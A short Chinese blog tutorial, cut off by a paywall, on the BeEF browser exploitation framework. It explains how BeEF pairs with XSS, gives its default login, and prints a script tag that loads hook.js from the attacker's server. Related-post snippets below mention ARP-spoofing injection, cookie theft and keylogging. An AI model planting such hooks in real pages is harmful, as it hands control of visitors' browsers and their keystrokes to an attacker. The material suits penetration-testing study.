beef的简单使用

最新推荐文章于 2024-05-03 02:05:41 发布
最新推荐文章于 2024-05-03 02:05:41 发布
阅读量3.5k 收藏 8
点赞数 1
分类专栏: 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44940180/article/details/107549067
版权

beef

Beef主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行

Beef服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器)

Beef一般和XSS漏洞结合使用,使目标主机执行带有js的文件,但只能控制一个页面

默认账号密码beef

在这里插入图片描述
登录之后,浏览器输入http://192.168.3.59:3000/demos/butcher/index.html打开默认测试页面

Js脚本: < script src=“http://192.168.3.59:3000/hook.js”>< /script >
目标打开带有js脚本的文件后
然后beef中会看到被害者上线,可以进行控制,可以记录键盘输入
(浏览器输入http://192.168.3.59:3000/ui/panel)

在这里插入图片描述

最低0.47元/天 解锁文章
雪碧可乐_
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BEEF基础使用
课嗨教育的专栏
09-07 281
BeEF,全称 The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认识。
BEEF的简介与使用
永远是少年
10-31 2145
今天继续给大家介绍渗透测试相关知识,本文主要内容是BEEF的简介与使用。 一、BEEF简介 二、BEEF渗透测试实战
2024年最新Beefxss使用教程图文教程(超详细)_怎么把beef改成公网ip
最新发布
2401_84265972的博客
05-03 194
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 1325
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
beef使用
xyx107的博客
10-03 1843
1.将虚拟机联网方式改为桥接,成功后ifconfig可以得到与宿主机相同网段的IP,两者同级别。(nat连接不是同一级别,网段不同) 遇到问题:改为桥接后kali不能联网。 原因:应该是,虚拟机使用了主机不能联网的网卡,可以尝试使用主机网卡 解决:在编辑里找到虚拟网络编辑器 现在可以正常联网 2.写一个网页,用户访问此页面。 3.打开beef,可以浏览器访问IP:300...
Beef工具使用
热门推荐
wo41ge的博客
02-22 1万+
今天写一下这个工具Beef 我这里用kali 启动Apache:service apache2 start 然后安装Beef工具 我用脚本安装 命令: apt-get update apt-get install beef-xss apt-get install beef-xss beef-xss 启动之后 Hook: <script src="http://<IP>:3000/hook.js"></script> 会弹出来beef的登录窗口 这边我们在看一下bee
beef简单使用–结合中间人攻击注入钩子
超人学飞的日子
08-09 6731
    最近接触到了beef这款工具,看过基本教程后就自己进行了一次攻击尝试。 总体思路就是在内网下通过arp欺骗,修改response包,加入我们的钩子,十分简单。 首先是arp欺骗,这里用的是bettercap,可以参考我之前的文章。 开始arp欺骗:arp.spoof on 打开http代理:http.proxy on 下面我们要写一个js文件用于处理返回的response包,...
raylib-beef:用于Beef编程语言的raylib绑定
05-06
雷利比牛肉raylib-beef是Raylib 3.1 dev的Beef包装器库,这是一个简单易用的库。 结合Beef编程语言的优势,制作游戏绝对令人满足! 注意力! 这种绑定仍在开发中。 可能会发生错误。 二进制文件已从存储库中删除。 ...
key_beef.zip_28335读取io_DSP GPIO BEEF_DSP28335 IO_DSP28335蜂鸣器_按键
09-14
标题中的“key_beef.zip_28335读取io_DSP GPIO BEEF_DSP28335 IO_DSP28335蜂鸣器_按键”表明了这个压缩包内容是关于使用TI公司的TMS320F28335 DSP(数字信号处理器)进行I/O操作,特别是GPIO(通用输入/输出)功能,...
Beef Boss Fortnite Wallpapers New Tab-crx插件
03-12
使用方法:-单击“添加到Chrome”按钮安装此Beef Boss扩展,它将自动添加。 等待几秒钟,然后加载,最好的跟随! -在左上角,“齿轮”。 这将加载设置面板,您可以在其中使用切换按钮来打开或关闭功能。 此外,您...
brainfuck-cool-helloworld-:我是无聊的
04-10
它的设计目的是作为对当时流行的语言进行讽刺,同时也是一种挑战,因为其语法极其简单但极其难读难写。 2. **基本语法**:Brainfuck只有8个命令字符,分别是 `< > + - . , [ ]`。它们分别代表指针移动、值增减、...
ariyana:Ariyana是用Orthodox C ++和Beef编写的ECS进行中游戏引擎,专注于跨平台和多人游戏
02-04
简单的编码样式和API 实体组件系统 跨平台不仅代码,而且纹理和着色器也将在构建阶段转换为目标平台。 异步文件I / O 纹理转换和加载。 支持。 通过网络支持 保护客户端和服务器 自动序列化和反序列化实体及其...
Kali中Beef使用教程
weixin_43287317的博客
04-02 5273
Kali中Beef使用教程
Beefxss使用教程图文教程(超详细)
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
【渗透测试工具beef】XSS渗透测试工具beef如何安装使用
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
04-25 7287
目录 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 .
BEEF使用简单版)
zzlx123的博客
12-20 2471
BeEF BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段...
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Bettercap2.6与beef使用
请你吃橘子
06-19 3129
bettercap已经更新到了2.6版本,网上的一些教程已经有点过时了。刚好期末作业是这个课题的,就简单记录一下。一、bettercap2.6介绍    请参考大佬的博客 https://blog.csdn.net/qq_33917045/article/details/80468866二、安装   apt-get install bettercap如果无法安装,请将kali升级到最新版本并设置更...
BeEF
MyDriverC
12-16 1472
一、BeEF简介   BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。可在其官网找到更详细的介绍http://beefproject.com/。   二、安装BeEF   先下载Beef最新版本   $ svn checkout http://beef.googlecode.com/svn/track/ beef   $ ruby install
XSS攻击详解:原理、分类与安全防护
Beef的界面直观,操作简单,提供了一系列模块,允许攻击者执行各种JavaScript命令。模块的颜色标识代表其可执行状态,绿色表示可正常工作且用户不可见,橙色表示可工作但用户可见,灰色表示可能工作,红色表示无法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值